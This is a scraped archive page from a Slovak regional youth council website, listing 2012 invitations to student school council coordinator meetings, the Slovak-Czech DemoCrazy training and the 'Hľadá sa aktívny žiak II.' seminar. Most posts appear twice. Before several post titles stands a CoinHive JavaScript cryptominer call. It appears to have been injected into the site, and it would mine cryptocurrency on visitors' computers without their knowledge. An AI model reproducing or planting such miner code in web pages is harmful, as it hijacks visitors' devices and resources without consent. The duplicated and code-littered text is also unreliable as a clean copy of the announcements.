Category Archives: Žiacke školské rady

Home / Archive by category "Žiacke školské rady"

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Súťaž o najaktívnejšiu ŽŠR, člena a koordinátora

Viac o projekte

Súťaž o najaktívnejšiu ŽŠR, člena a koordinátora

Viac o projekte

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Pozvánka: Stretnutie koordinátorov ŽŠR II.

Pozývame Vás na Pracovné stretnutie koordinátorov Žiackych školských rád II. stredných škôl na území PSK, ktoré sa uskutoční 4.10.2012 v Prešove. Jeho cieľom je predstavenie projektov v oblasti vzdelávania členov a koordinátorov ŽŠR v šk. roku 2012/2013. Okrem toho bude na tomto stretnutí predstavený a vyhlásený 1. ročník súťaže o najaktívnejšiu ŽŠR, člena a koordinátora ŽŠR v PSK za rok 2012.

Toto podujatie je organizované Radou mládeže Prešovského kraja v spolupráci s Odborom školstva Úradu PSK.

Tešíme sa na Vašu účasť.

 

Kontaktná osoba:

Lucia Kažimírová, +421 902 348 887

Pozvánka: Stretnutie koordinátorov ŽŠR II.

Pozývame Vás na Pracovné stretnutie koordinátorov Žiackych školských rád II. stredných škôl na území PSK, ktoré sa uskutoční 4.10.2012 v Prešove. Jeho cieľom je predstavenie projektov v oblasti vzdelávania členov a koordinátorov ŽŠR v šk. roku 2012/2013. Okrem toho bude na tomto stretnutí predstavený a vyhlásený 1. ročník súťaže o najaktívnejšiu ŽŠR, člena a koordinátora ŽŠR v PSK za rok 2012.

Toto podujatie je organizované Radou mládeže Prešovského kraja v spolupráci s Odborom školstva Úradu PSK.

Tešíme sa na Vašu účasť.

 

Kontaktná osoba:

Lucia Kažimírová, +421 902 348 887

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Slovensko-české školenie: DemoCrazy

Miesto konania: 1. fáza – SR, 2. fáza – ČR, 3. fáza – SR (miesto jednotlivých fáz školení bude upresnené vybraným účastníkom)

Uzávierka prihlášok: 15. október 2012

Stiahnuť plagát

Termín: 25. 10. – 28. 10. 2012

Typ aktivity: medzinárodné česko-slovenské školenie (dlhodobé trojfázové školenie)

Krátka charakteristika:

Máte pocit, že nikoho nezaujíma, čo si myslia mladí ľudia? Máte čo povedať k rozhodnutiam, ktoré sa týkajú aj Vás a spoločnosti v ktorej žijete? Chcete sa zapájať do verejného života od miestnej až po medzinárodnú úroveň?

Školenie DemoCrazy ponúka možnosť dozvedieť sa viac z teoretického aj praktického hľadiska ako fungujú žiacke školské rady, mestské mládežnícke parlamenty a obecné rady mládeže na Slovensku a v Čechách. Počas školenia môžete získať odporúčania ako sa môže mládež aktívne zapájať na živote svojej školy, obce, mesta a tvorbe politiky pre mládež. Ak máte záujem byť v tíme mládežníkov, ktorí chcú prejsť od slov a fráz k uskutočňovaniu skutkov, práve Vás hľadáme na školenie DemoCrazy.

 

Ciele aktivity:   

1. fáza školenia (uskutoční sa v SR v obd. 25. – 28. 10. 2012) bude zameraná na:

 • prezentovanie možností zapájania sa mládeže na živote školy prostredníctvom efektívneho fungovania žiackej školskej rady na Slovensku a v Čechách,
 • rozvoj prezentačných zručností mladého/mládežníckeho vedúceho,
 • predstavenie programu Mládež v akcii so zameraním na Akciu 1.3 – Projekty mládežníckej demokracie a 5.1 – Stretnutia mladých ľudí a ľudí zodpovedných za mládežnícku politiku.

V 2. fáze školenia (uskutoční sa v ČR v obd. 11. – 13. 1. 2013) účastník získa informácie:

 • ako motivovať seba a ostatných do aktivvít
 • o úlohe a poslaní obecných rád mládeže a mestských mládežníckych parlamentoch na Slovensku a v Čechách,
 • ako vytvoriť vlastný projekt v rámci Akcie 1.3 a Akcie 5.1 programu Mládež v akcii.

3. fáza školenia (uskutoční sa v SR na jar 2013) bude obsahovať témy:

 • regionálna, národná a európska politika mládeže,
 • aká je a aká by mala byť komunikácia a spolupráca medzi samosprávou a mládežou,
 • ako vytvoriť osobný akčný plán mladého/mládežníckeho vedúceho.

Ciele:

 • zvýšiť participáciu a aktivizáciu mladých ľudí na miestnej/národnej a medzinárodnej úrovni;
 • získať poznatky v oblasti písania projektov v rámci programu Mládež v akcii (Akcia 1.3 a Akcia 5.1);
 • transformácia žiackych a študentských parlamentov na mestské, obecné parlamenty.

 

Pracovný jazyk: slovenčina / čeština

Cieľová skupina:   

Hlavnou cieľovou skupinou školenia sú mladí ľudia vo veku 16 – 18 rokov, členovia žiackych školských rád stredných škôl, mestských mládežníckych parlamentov, obecných rád mládeže, mládežníckych organizácii a v tretej fáze aj pracovníci s mládežou/ ľudia s rozhodovacou právomocou. Podmienkou nahlásenia sa je účasť na všetkých troch fázach školenia.

 

Počet účastníkov: 12 zo Slovenska / 12 z Čiech

Náklady spojené s účasťou na školení: 

Ubytovanie a strava sú hradené z prostriedkov programu EÚ Mládež v akcii. Účastník si hradí z vlastných nákladov cestovné náklady z/na miesto konania školenia. V prípade, že sa jedná o mladých ľudí s nedostatkom príležitostí (zlá ekonomická situácia a pod.), prosíme, kontaktujte nižšie uvedenú kontaktnú osobu.

Kontaktná osoba:

Mgr. Alena Tomanová (IUVENTA)

tel.: (421-2) 59 29 63 20
m.t.: (421-908) 67 88 14
e-mail: alena.tomanova@iuventa.sk

Klikajte na 

 – 
.

 

Slovensko-české školenie: DemoCrazy

Miesto konania: 1. fáza – SR, 2. fáza – ČR, 3. fáza – SR (miesto jednotlivých fáz školení bude upresnené vybraným účastníkom)

Uzávierka prihlášok: 15. október 2012

Stiahnuť plagát

Termín: 25. 10. – 28. 10. 2012

Typ aktivity: medzinárodné česko-slovenské školenie (dlhodobé trojfázové školenie)

Krátka charakteristika:

Máte pocit, že nikoho nezaujíma, čo si myslia mladí ľudia? Máte čo povedať k rozhodnutiam, ktoré sa týkajú aj Vás a spoločnosti v ktorej žijete? Chcete sa zapájať do verejného života od miestnej až po medzinárodnú úroveň?

Školenie DemoCrazy ponúka možnosť dozvedieť sa viac z teoretického aj praktického hľadiska ako fungujú žiacke školské rady, mestské mládežnícke parlamenty a obecné rady mládeže na Slovensku a v Čechách. Počas školenia môžete získať odporúčania ako sa môže mládež aktívne zapájať na živote svojej školy, obce, mesta a tvorbe politiky pre mládež. Ak máte záujem byť v tíme mládežníkov, ktorí chcú prejsť od slov a fráz k uskutočňovaniu skutkov, práve Vás hľadáme na školenie DemoCrazy.

 

Ciele aktivity:   

1. fáza školenia (uskutoční sa v SR v obd. 25. – 28. 10. 2012) bude zameraná na:

 • prezentovanie možností zapájania sa mládeže na živote školy prostredníctvom efektívneho fungovania žiackej školskej rady na Slovensku a v Čechách,
 • rozvoj prezentačných zručností mladého/mládežníckeho vedúceho,
 • predstavenie programu Mládež v akcii so zameraním na Akciu 1.3 – Projekty mládežníckej demokracie a 5.1 – Stretnutia mladých ľudí a ľudí zodpovedných za mládežnícku politiku.

V 2. fáze školenia (uskutoční sa v ČR v obd. 11. – 13. 1. 2013) účastník získa informácie:

 • ako motivovať seba a ostatných do aktivvít
 • o úlohe a poslaní obecných rád mládeže a mestských mládežníckych parlamentoch na Slovensku a v Čechách,
 • ako vytvoriť vlastný projekt v rámci Akcie 1.3 a Akcie 5.1 programu Mládež v akcii.

3. fáza školenia (uskutoční sa v SR na jar 2013) bude obsahovať témy:

 • regionálna, národná a európska politika mládeže,
 • aká je a aká by mala byť komunikácia a spolupráca medzi samosprávou a mládežou,
 • ako vytvoriť osobný akčný plán mladého/mládežníckeho vedúceho.

Ciele:

 • zvýšiť participáciu a aktivizáciu mladých ľudí na miestnej/národnej a medzinárodnej úrovni;
 • získať poznatky v oblasti písania projektov v rámci programu Mládež v akcii (Akcia 1.3 a Akcia 5.1);
 • transformácia žiackych a študentských parlamentov na mestské, obecné parlamenty.

 

Pracovný jazyk: slovenčina / čeština

Cieľová skupina:   

Hlavnou cieľovou skupinou školenia sú mladí ľudia vo veku 16 – 18 rokov, členovia žiackych školských rád stredných škôl, mestských mládežníckych parlamentov, obecných rád mládeže, mládežníckych organizácii a v tretej fáze aj pracovníci s mládežou/ ľudia s rozhodovacou právomocou. Podmienkou nahlásenia sa je účasť na všetkých troch fázach školenia.

 

Počet účastníkov: 12 zo Slovenska / 12 z Čiech

Náklady spojené s účasťou na školení: 

Ubytovanie a strava sú hradené z prostriedkov programu EÚ Mládež v akcii. Účastník si hradí z vlastných nákladov cestovné náklady z/na miesto konania školenia. V prípade, že sa jedná o mladých ľudí s nedostatkom príležitostí (zlá ekonomická situácia a pod.), prosíme, kontaktujte nižšie uvedenú kontaktnú osobu.

Kontaktná osoba:

Mgr. Alena Tomanová (IUVENTA)

tel.: (421-2) 59 29 63 20
m.t.: (421-908) 67 88 14
e-mail: alena.tomanova@iuventa.sk

Klikajte na 

 – 
.

 

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Pozvánka: Stretnutie koordinátorov ŽŠR v Prešove

Dňa 26.6.2012 sa v Prešove uskutoční Pracovné stretnutie koordinátorov Žiackych školských rád stredných škôl na území PSK.

Jeho cieľom je zhodnotenie školského roka 2011/2012 v oblasti činnosti ŽŠR na území PSK a vzdelávania ich členov a tiež vytvorenie plánu činnosti v oblasti práce so ŽŠR v školskom roku 2012/2013.

 

 

Kontaktná osoba:
Lucia Kažimírová
kazimirova@rmpk.sk
+421 902 348 887

 

Pozvánka: Stretnutie koordinátorov ŽŠR v Prešove

Dňa 26.6.2012 sa v Prešove uskutoční Pracovné stretnutie koordinátorov Žiackych školských rád stredných škôl na území PSK.

Jeho cieľom je zhodnotenie školského roka 2011/2012 v oblasti činnosti ŽŠR na území PSK a vzdelávania ich členov a tiež vytvorenie plánu činnosti v oblasti práce so ŽŠR v školskom roku 2012/2013.

 

 

Kontaktná osoba:
Lucia Kažimírová
kazimirova@rmpk.sk
+421 902 348 887

 

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Školenie: Hľadá sa aktívny žiak II.

V rámci projektu „Žiacka participácia“, ktorý sa realizuje vďaka podpore z Fondu Hodina deťom, ktorý zriadila a spravuje Nadácia pre deti Slovenska, opäť pozývame členov žiackych školských rád (ŽŠR) stredných škôl na území mesta Prešov, ktorí sa zúčastnili vzdelávacieho seminára Hľadá sa aktívny žiak I. v mesiacoch október – november 2011 na nadstavbové neformálne vzdelávanie s názvom „Hľadá sa aktívny žiak II.“

Dátum konania: 24. – 25. máj 2012 alebo 5.-6. jún 2012

Miesto konania: Sigord, Zelený breh

Realizátorom projektu je Rada mládeže Prešovského kraja – odborný garant problematiky ŽŠR pre MŠVVaŠ SR a Iuventu – Slovenský inštitút mládeže na území PSK.

Projektoví partneri sú: Odbor školstva Úradu Prešovského samosprávneho kraja, Stredoškolský parlament Prešovského samosprávneho kraja, Centrum pedagogicko-psychologického poradenstva a prevencie v Prešove

Tento seminár je limitovaný počtom účastníkov 15.

Všetky dôležité informácie a teda pozvánku, program a prihlášku nájdete nižšie.

Veríme, že sa Vám táto ponuka bude páčiť a uvidíme sa na školení.

Školenie: Hľadá sa aktívny žiak II.

V rámci projektu „Žiacka participácia“, ktorý sa realizuje vďaka podpore z Fondu Hodina deťom, ktorý zriadila a spravuje Nadácia pre deti Slovenska, opäť pozývame členov žiackych školských rád (ŽŠR) stredných škôl na území mesta Prešov, ktorí sa zúčastnili vzdelávacieho seminára Hľadá sa aktívny žiak I. v mesiacoch október – november 2011 na nadstavbové neformálne vzdelávanie s názvom „Hľadá sa aktívny žiak II.“

Dátum konania: 24. – 25. máj 2012 alebo 5.-6. jún 2012

Miesto konania: Sigord, Zelený breh

Realizátorom projektu je Rada mládeže Prešovského kraja – odborný garant problematiky ŽŠR pre MŠVVaŠ SR a Iuventu – Slovenský inštitút mládeže na území PSK.

Projektoví partneri sú: Odbor školstva Úradu Prešovského samosprávneho kraja, Stredoškolský parlament Prešovského samosprávneho kraja, Centrum pedagogicko-psychologického poradenstva a prevencie v Prešove

Tento seminár je limitovaný počtom účastníkov 15.

Všetky dôležité informácie a teda pozvánku, program a prihlášku nájdete nižšie.

Veríme, že sa Vám táto ponuka bude páčiť a uvidíme sa na školení.